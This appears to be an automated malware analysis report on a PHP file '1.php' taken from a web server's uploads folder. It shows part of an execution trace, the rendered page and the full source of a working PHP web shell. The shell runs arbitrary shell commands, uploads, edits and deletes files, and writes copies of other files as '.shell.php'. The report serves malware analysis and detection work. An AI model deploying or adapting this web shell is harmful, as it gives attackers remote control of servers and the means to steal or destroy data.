3		A						/var/www/html/uploads/1.php	114	$s_e = 1
4	74	0	0.003369	480032	floor	0		/var/www/html/uploads/1.php	115	1	1
4	74	1	0.003381	480064
4	74	R			1
4	75	0	0.003453	480032	pow	0		/var/www/html/uploads/1.php	115	2	1024	1
4	75	1	0.003476	480104
4	75	R			1024
4	76	0	0.003490	480032	sprintf	0		/var/www/html/uploads/1.php	115	2	'%.2f KB'	9.5029296875
4	76	1	0.003505	480416
4	76	R			'9.50 KB'
3	70	1	0.003519	480320
3	70	R			'9.50 KB'
2	68	1	0.003532	480320
2	68	R			'9.50 KB'
2	77	0	0.003545	480000	getowner	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/1.php'
3	78	0	0.003557	480000	function_exists	0		/var/www/html/uploads/1.php	54	1	'posix_getpwuid'
3	78	1	0.003571	480040
3	78	R			TRUE
3	79	0	0.003583	480000	fileowner	0		/var/www/html/uploads/1.php	54	1	'/var/www/html/uploads/1.php'
3	79	1	0.003595	480040
3	79	R			1000
3	80	0	0.003607	480000	posix_getpwuid	0		/var/www/html/uploads/1.php	54	1	1000
3	80	1	0.003639	480816
3	80	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = 'osboxes'
2	77	1	0.003694	480032
2	77	R			'osboxes'
2	81	0	0.003708	480000	getgroup	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/1.php'
3	82	0	0.003719	480000	function_exists	0		/var/www/html/uploads/1.php	55	1	'posix_getgrgid'
3	82	1	0.003733	480040
3	82	R			TRUE
3	83	0	0.003745	480000	filegroup	0		/var/www/html/uploads/1.php	55	1	'/var/www/html/uploads/1.php'
3	83	1	0.003757	480040
3	83	R			1000
3	84	0	0.003768	480000	posix_getgrgid	0		/var/www/html/uploads/1.php	55	1	1000
3	84	1	0.003800	480656
3	84	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/1.php	55	$dgrp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/1.php	55	$dgrp = 'osboxes'
2	81	1	0.003845	480032
2	81	R			'osboxes'
2	85	0	0.003860	480000	getperms	1		/var/www/html/uploads/1.php	250	1	'/var/www/html/uploads/1.php'
3	86	0	0.003872	480000	fileperms	0		/var/www/html/uploads/1.php	70	1	'/var/www/html/uploads/1.php'
3	86	1	0.003889	480040
3	86	R			33204
2		A						/var/www/html/uploads/1.php	70	$s_m = 33204
2		A						/var/www/html/uploads/1.php	71	$s_p = 'u'
2		A						/var/www/html/uploads/1.php	74	$s_p = '-'
2		A						/var/www/html/uploads/1.php	79	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	80	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	81	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	82	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	83	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	84	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	85	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	86	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	87	$s_p .= '-'
2	85	1	0.004008	480040
2	85	R			'-rw-rw-r--'
2	87	0	0.004024	480000	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/data'
2	87	1	0.004039	480040
2	87	R			FALSE
2	88	0	0.004052	480008	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/prepend.php'
2	88	1	0.004067	480056
2	88	R			TRUE
2	89	0	0.004081	480016	getsize	1		/var/www/html/uploads/1.php	248	1	'/var/www/html/uploads/prepend.php'
3	90	0	0.004094	480016	filesize	0		/var/www/html/uploads/1.php	118	1	'/var/www/html/uploads/prepend.php'
3	90	1	0.004107	480056
3	90	R			57
2		A						/var/www/html/uploads/1.php	118	$s_s = 57
3	91	0	0.004136	480016	ts	1		/var/www/html/uploads/1.php	121	1	57
3		A						/var/www/html/uploads/1.php	113	$s_w = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB', 5 => 'PB', 6 => 'EB', 7 => 'ZB', 8 => 'YB']
4	92	0	0.004164	480016	log	0		/var/www/html/uploads/1.php	114	1	57
4	92	1	0.004175	480048
4	92	R			4.0430512678346
4	93	0	0.004190	480016	log	0		/var/www/html/uploads/1.php	114	1	1024
4	93	1	0.004201	480048
4	93	R			6.9314718055995
4	94	0	0.004215	480016	floor	0		/var/www/html/uploads/1.php	114	1	0.58328900141647
4	94	1	0.004227	480048
4	94	R			0
3		A						/var/www/html/uploads/1.php	114	$s_e = 0
4	95	0	0.004250	480048	floor	0		/var/www/html/uploads/1.php	115	1	0
4	95	1	0.004261	480080
4	95	R			0
4	96	0	0.004273	480048	pow	0		/var/www/html/uploads/1.php	115	2	1024	0
4	96	1	0.004285	480120
4	96	R			1
4	97	0	0.004297	480048	sprintf	0		/var/www/html/uploads/1.php	115	2	'%.2f B'	57
4	97	1	0.004311	480432
4	97	R			'57.00 B'
3	91	1	0.004324	480336
3	91	R			'57.00 B'
2	89	1	0.004337	480336
2	89	R			'57.00 B'
2	98	0	0.004350	480016	getowner	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/prepend.php'
3	99	0	0.004363	480016	function_exists	0		/var/www/html/uploads/1.php	54	1	'posix_getpwuid'
3	99	1	0.004376	480056
3	99	R			TRUE
3	100	0	0.004389	480016	fileowner	0		/var/www/html/uploads/1.php	54	1	'/var/www/html/uploads/prepend.php'
3	100	1	0.004402	480056
3	100	R			0
3	101	0	0.004414	480016	posix_getpwuid	0		/var/www/html/uploads/1.php	54	1	0
3	101	1	0.004436	480816
3	101	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = 'root'
2	98	1	0.004487	480048
2	98	R			'root'
2	102	0	0.004501	480016	getgroup	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/prepend.php'
3	103	0	0.004513	480016	function_exists	0		/var/www/html/uploads/1.php	55	1	'posix_getgrgid'
3	103	1	0.004526	480056
3	103	R			TRUE
3	104	0	0.004539	480016	filegroup	0		/var/www/html/uploads/1.php	55	1	'/var/www/html/uploads/prepend.php'
3	104	1	0.004552	480056
3	104	R			0
3	105	0	0.004564	480016	posix_getgrgid	0		/var/www/html/uploads/1.php	55	1	0
3	105	1	0.004585	480672
3	105	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = 'root'
2	102	1	0.004630	480048
2	102	R			'root'
2	106	0	0.004644	480016	getperms	1		/var/www/html/uploads/1.php	250	1	'/var/www/html/uploads/prepend.php'
3	107	0	0.004656	480016	fileperms	0		/var/www/html/uploads/1.php	70	1	'/var/www/html/uploads/prepend.php'
3	107	1	0.004673	480056
3	107	R			33261
2		A						/var/www/html/uploads/1.php	70	$s_m = 33261
2		A						/var/www/html/uploads/1.php	71	$s_p = 'u'
2		A						/var/www/html/uploads/1.php	74	$s_p = '-'
2		A						/var/www/html/uploads/1.php	79	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	80	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	81	$s_p .= 'x'
2		A						/var/www/html/uploads/1.php	82	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	83	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	84	$s_p .= 'x'
2		A						/var/www/html/uploads/1.php	85	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	86	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	87	$s_p .= 'x'
2	106	1	0.004794	480056
2	106	R			'-rwxr-xr-x'
1	3	1	0.004811	479952
			0.004848	368512
TRACE END   [2023-02-12 22:41:17.985191]

Generated HTML code
<html><head>
<link href="" rel="stylesheet" type="text/css">
<style>
body{
font-family:Times New Roman;
background-color: black;
color:white;
}
#content tr:hover{
background-color: blue;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: blue;
}
table{
border: 1px #000000 dotted;
}
a{
color:white;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head>
<body>
	<title>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</title>



<form method="post" class="in" enctype="multipart/form-data" action="?d=/var/www/html&amp;a=upload"> Upload file :<input type="file" name="filup[]" multiple="" style="border: 0"><input type="submit" name="upload" value=">>"></form><form method="post" action="?d=/var/www/html&amp;a=cmd" class="in"> Command : <input type="text" name="cmd"></form>
<form method="post" action="?d=/var/www/html&amp;a=up">
</form>
<a href="?d=/var/www/html&amp;a=up">Upload</a>

<hr>
Current Dir=|&gt; <a href="?d=/">/</a><a href="?d=/var">var</a>/<a href="?d=/var/www">www</a>/<a href="?d=/var/www/html">html</a>/<table align="center" class="table">
	<tbody><tr><th>Files</th><th>Size</th><th>owner:group</th><th>Permission</th><th>Action</th>
</tr><tr><td><a href="?d=/var/www">Current dir</a></td><td>--</td><td>--</td><td>--</td><td align="right"><a href="?d=/var/www/html&amp;a=touch">Newfile</a> | <a href="?d=/var/www/html&amp;a=mkdir">newdir</a></td></tr>	<tr><td><a href="?d=/var/www/html&amp;a=view&amp;f=1.php">1.php</a></td>
	<td>9.50 KB</td>
	<td>osboxes:osboxes</td>
	<td>-rw-rw-r--</td>
	<td align="right">
	<a href="?d=/var/www/html&amp;a=rename&amp;f=1.php">Rename</a> |
	<a href="?d=/var/www/html/1.php&amp;a=delete">delete</a> |
	<a href="?d=/var/www/html&amp;a=edit&amp;f=1.php">edit</a> |
	<a href="?d=/var/www/html&amp;a=download&amp;f=1.php">download</a></td>
	</tr>
		<tr><td><a href="?d=/var/www/html&amp;a=view&amp;f=beneri.se_malware_analysis">beneri.se_malware_analysis</a></td>
	<td>0</td>
	<td>root:root</td>
	<td>-rw-r--r--</td>
	<td align="right">
	<a href="?d=/var/www/html&amp;a=rename&amp;f=beneri.se_malware_analysis">Rename</a> |
	<a href="?d=/var/www/html/beneri.se_malware_analysis&amp;a=delete">delete</a> |
	<a href="?d=/var/www/html&amp;a=edit&amp;f=beneri.se_malware_analysis">edit</a> |
	<a href="?d=/var/www/html&amp;a=download&amp;f=beneri.se_malware_analysis">download</a></td>
	</tr>
	</tbody></table>
</body></html>
Original PHP code
<!DOCTYPE HTML>
<html>
<head>
<link href="" rel="stylesheet" type="text/css">
<style>
body{
font-family:Times New Roman;
background-color: black;
color:white;
}
#content tr:hover{
background-color: blue;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: blue;
}
table{
border: 1px #000000 dotted;
}
a{
color:white;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head>
<body>
<?php
error_reporting(0);
set_time_limit(0);
header("X-XSS-Protection: 0");
function getpath()
{
	if(isset($_GET['d']))
	{
		$d=$_GET['d'];
	}else{
		$d=getcwd();
	}
	return $d;
}
function cmd($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents();@ob_end_clean(); return $buff; 	} elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; 	} elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; 	} elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; }}
function delete($dir){if(is_dir($dir)){if(!rmdir($dir)){$s=scandir($dir);foreach ($s as $ss) {if(is_file($dir."/".$ss)){if(unlink($dir."/".$ss)){$rm=rmdir($dir);}}if(is_dir($dir."/".$ss)){$rm=rmdir($dir."/".$ss);$rm.=rmdir($dir);$rm.=system('rm -rf '.$dir);}}}}elseif(is_file($dir)){$rm = unlink($dir);if(!$rm){system('rm -rf '.$dir);}}return $rm;}
function getowner($path){if(function_exists('posix_getpwuid')) {$downer = @posix_getpwuid(fileowner($path));$downer = $downer['name'];} else {$downer = fileowner($path);}return $downer;}
function getgroup($path){if(function_exists('posix_getgrgid')) {$dgrp = @posix_getgrgid(filegroup($path));$dgrp = $dgrp['name'];} else { $dgrp = filegroup($path);}return $dgrp;}
function upload($a,$b){ if(function_exists('move_uploaded_file')){$upl = move_uploaded_file($a,$b);}elseif (function_exists('copy')) {  $upl = copy($a,$b);}return $upl; }function array_upload($file){ $file_ary = array(); $file_count = count($file['name']); $file_key = array_keys($file); for($i=0;$i<$file_count;$i++) { foreach($file_key as $val) { $file_ary[$i][$val] = $file[$val][$i]; } } return $file_ary;}
function sedirs($dir)
{
	if(function_exists('scandir'))
	{
		$s=scandir($dir);
		chdir($dir);
	}else{
		$s=system($dir);
	}
	return $s;
}
function getperms($files)
{
		if($s_m = @fileperms($files)){
		$s_p = 'u';
		if(($s_m & 0xC000) == 0xC000)$s_p = 's';
		elseif(($s_m & 0xA000) == 0xA000)$s_p = 'l';
		elseif(($s_m & 0x8000) == 0x8000)$s_p = '-';
		elseif(($s_m & 0x6000) == 0x6000)$s_p = 'b';
		elseif(($s_m & 0x4000) == 0x4000)$s_p = 'd';
		elseif(($s_m & 0x2000) == 0x2000)$s_p = 'c';
		elseif(($s_m & 0x1000) == 0x1000)$s_p = 'p';
		$s_p .= ($s_m & 00400)? 'r':'-';
		$s_p .= ($s_m & 00200)? 'w':'-';
		$s_p .= ($s_m & 00100)? 'x':'-';
		$s_p .= ($s_m & 00040)? 'r':'-';
		$s_p .= ($s_m & 00020)? 'w':'-';
		$s_p .= ($s_m & 00010)? 'x':'-';
		$s_p .= ($s_m & 00004)? 'r':'-';
		$s_p .= ($s_m & 00002)? 'w':'-';
		$s_p .= ($s_m & 00001)? 'x':'-';
		return $s_p;
	}
	else return "???????????";
}
function downloads($file)
{
	@ob_clean();
	header('Content-Description: File Transfer');
	header('Content-Type: application/octet-stream');
	header('Content-Disposition: attachment; filename="'.basename($file).'"');
	header('Expires: 0');header('Cache-Control: must-revalidate');
	header('Pragma: public');
	header('Content-Length: ' . filesize($file));
	readfile($file);
	exit;
}
function viewfilefunc($file)
{
	echo "<center><h1> View : ".basename($file)."</h1>";
	echo "<textarea readonly cols='100' rows='40'>";
	echo htmlspecialchars(file_get_contents($file));
	echo "</textarea></center>";
}
function ts($s_s){
	if($s_s<=0) return 0;
	$s_w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
	$s_e = floor(log($s_s)/log(1024));
	return sprintf('%.2f '.$s_w[$s_e], ($s_s/pow(1024, floor($s_e))));
}
function getsize($s_f){
	$s_s = @filesize($s_f);
	if($s_s !== false){
		if($s_s<=0) return 0;
		return ts($s_s);
	}
	else return "???";
}
function kuchiyose($a,$b)
{
	$fgc=file_get_contents($a);
	$fp=fopen($b.".shell.php",'w');
	fwrite($fp,$fgc);
	fclose($fp);
}
function cekk($f){
	if(file_exists($f.".shell.php")){
		echo "<b>Request done ! <a href='$f.shell.php' target='_blank'>Click here</a>";
	}
}
function renamefunc($dir,$oldname){
	echo "<center><h1>Rename : ".$oldname."</h1><br><form method='POST' class='in'>oldname : <input type='text' value='$oldname' class='in' readonly>";
	echo "Newname : <input type='text' name='newname' value='newname' class='in'><input type='submit' value='>>' name='s'></form></center>";
	if(isset($_POST['s'])){
		rename($dir."/".$oldname,$dir."/".$_POST['newname']);
		echo "<meta http-equiv='refresh' content='0;url=?d=".dirname($dir)."'>";
	}
}
function editfunc($dir,$file){
	echo "<center><h1> Edit : ".$file."</h1><br><form method='POST'>";
	echo "<textarea name='editfile' cols='100' rows='40'>".htmlspecialchars(file_get_contents($dir."/".$file))."</textarea><br>";
	echo "<input type='submit' name='sbmt' value='>>submit<<' style='width:200px;'>";
	echo "</form>";
	if(isset($_POST['sbmt']))
	{
		$fp=fopen($dir."/".$file,'w');
		fwrite($fp,$_POST['editfile']);
		fclose($fp);
		echo "<br><b>Tersimpan @".date('D ,d m Y')."</b><br>";
	}
}
function berinamafunc($dir){
	echo "<center><h1>New file </h1><br><form method='POST' class='in'>";
	echo "Filename : <input type='text' name='filename' value='newfile.php'>";
	echo "<input type='submit' name='svi' value='>>'>";
	echo "</form>";
	if(isset($_POST['svi']))
	{
		if(function_exists('touch')){
			touch($dir."/".$_POST['filename']);
		}else{
			$fp=fopen($dir."/".$_POST['filename'],'w');
			fwrite($fp,'#new file 1945');
			fclose($fp);
		}
		header('location:?d='.$dir.'&a=edit&f='.$_POST['filename']);
	}
}
function mkdirfunc($dir){
	echo "<center><h1>New directory</h1>";
	echo "<form method='POST' class='in'>New dir:<input type='text' name='mkdir'>";
	echo "<input type='submit' name='sbmt' value='>>'></form></center>";
	if(isset($_POST['sbmt']))
	{
		mkdir($dir."/".$_POST['mkdir']);
		echo "<meta http-equiv='refresh' content='0;url=?d=".$dir."'>";
	}

}
$gp=getpath();
$y =php_uname();
?>
	<title><?php echo $y; ?></title>
</head>
<body>
</form>
<form method="post" class="in" enctype="multipart/form-data" action="?d=<?=$gp;?>&a=upload"> Upload file :<input type="file" name="filup[]" multiple="" style="border: 0"><input type="submit" name="upload" value=">>"></form><form method="post" action="?d=<?=$gp;?>&a=cmd" class="in"> Command : <input type="text" name="cmd"></form>
<form method="post" action="?d=<?=$gp;?>&a=up">
</form>
<a href="?d=<?=$gp;?>&a=up">Upload</a>
</div>
<hr>
<?php
echo "Current Dir=|> ";
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?d=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?d=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
						
if(empty($_GET['a']))
{
	?>
<table align="center" class="table">
	<th>Files</th><th>Size</th><th>owner:group</th><th>Permission</th><th>Action</th>
<?php
$dir=sedirs(getpath());
echo "<tr><td><a href=\"?d=".dirname($gp)."\">Current dir</a></td><td>--</td><td>--</td><td>--</td><td align=right><a href='?d=$gp&a=touch'>Newfile</a> | <a href='?d=$gp&a=mkdir'>newdir</a></td></tr>";
foreach($dir as $d1)
{if(!is_dir("$gp/$d1")||$d1=="."||$d1=="..")continue;
	?>
	<tr><td>[<a href="?d=<?="$gp/$d1"?>"><?=$d1;?></a>]</td>
	<td><?=getsize("$gp/$d1");?></td>
	<td><?=getowner("$gp/$f1");?>:<?=getgroup("$gp/$f1");?></td>
	<td><?=getperms("$gp/$d1");?></td>
	<td align="right"><a href="?d=<?="$gp/$d1"?>&a=rename">Rename</a> | <a href="?d=<?="$gp/$d1"?>&a=delete">Delete</a></td>
	</tr>
	<?php
}
foreach($dir as $f1)
{
	if(!is_file("$gp/$f1")||$f1=="."||$f1=="..")continue;
?>
	<tr><td><a href="?d=<?=$gp;?>&a=view&f=<?=$f1;?>"><?=$f1;?></a></td>
	<td><?=getsize("$gp/$f1");?></td>
	<td><?=getowner("$gp/$f1");?>:<?=getgroup("$gp/$f1");?></td>
	<td><?=getperms("$gp/$f1");?></td>
	<td align="right">
	<a href="?d=<?=$gp;?>&a=rename&f=<?=$f1;?>">Rename</a> |
	<a href="?d=<?="$gp/$f1";?>&a=delete">delete</a> |
	<a href="?d=<?=$gp;?>&a=edit&f=<?=$f1;?>">edit</a> |
	<a href="?d=<?=$gp;?>&a=download&f=<?=$f1;?>">download</a></td>
	</tr>
	<?php
}
?>
</table>
<?php
}else{
@$a=$_GET['a'];
@$f=$_GET['f'];
@$d=$_GET['d'];
if($a=="view")
{viewfilefunc($d."/".$f);}elseif($a=="download"){downloads($d."/".$f);}
elseif($a=="logout"){if(setcookie(md5($_SERVER['HTTP_HOST']),""))
	echo "<script>alert('See You Next time !');window.location.href='????'</script>";}

elseif($a=="rename"){$ff=(isset($_GET['f']) ? $_GET['f'] : basename($_GET['d']));$gdd=(isset($_GET['f'])) ? $_GET['d'] : dirname($_GET['d']); renamefunc($gdd,$ff);}
elseif($a=="delete"){delete($_GET['d']);echo "<meta http-equiv='refresh' content='0;url=?d=".dirname($_GET['d'])."'>";}
elseif($a=="upload"){
	$fil=array_upload($_FILES['filup']); foreach($fil as $filup)
	{
		$filoc=$d."/".$filup['name'];
		if(upload($filup['tmp_name'],$filoc))
		{
			echo "<font color=lime>Successfully upload -> <a href='?d=".$d."&a=view&f=".$filup['name']."'>".$filoc."</a></font><br>";
		}else{
			echo "<font color=red>Failed upload -> ".$filoc."</font><br>";
		}
	}
}
elseif($a=="mkdir"){mkdirfunc($d);}
elseif($a=="touch"){berinamafunc($d);}
elseif($a=="edit"){editfunc($_GET['d'],$_GET['f']);}



}
?>
PHP Malware Analysis

1.php

md5: d8992f44fb3646573cb5b7bc6f960d19

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
